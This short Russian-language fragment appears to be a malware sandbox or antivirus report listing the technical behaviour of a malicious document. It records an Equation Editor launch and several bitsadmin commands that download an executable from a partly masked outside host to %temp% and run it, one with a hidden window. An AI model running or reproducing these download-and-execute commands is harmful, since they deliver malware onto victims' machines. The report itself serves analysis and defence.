Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://br###creeks.com/paul/SQWKWZ.exe %temp%\Uz.Jar&%temp%\Uz.Jar
- DNS ASK br###creeks.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://br###creeks.com/paul/SQWKWZ.exe %temp%\Uz.Jar&%temp%\Uz.Jar' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download http://br###creeks.com/paul/SQWKWZ.exe %TEMP%\Uz.Jar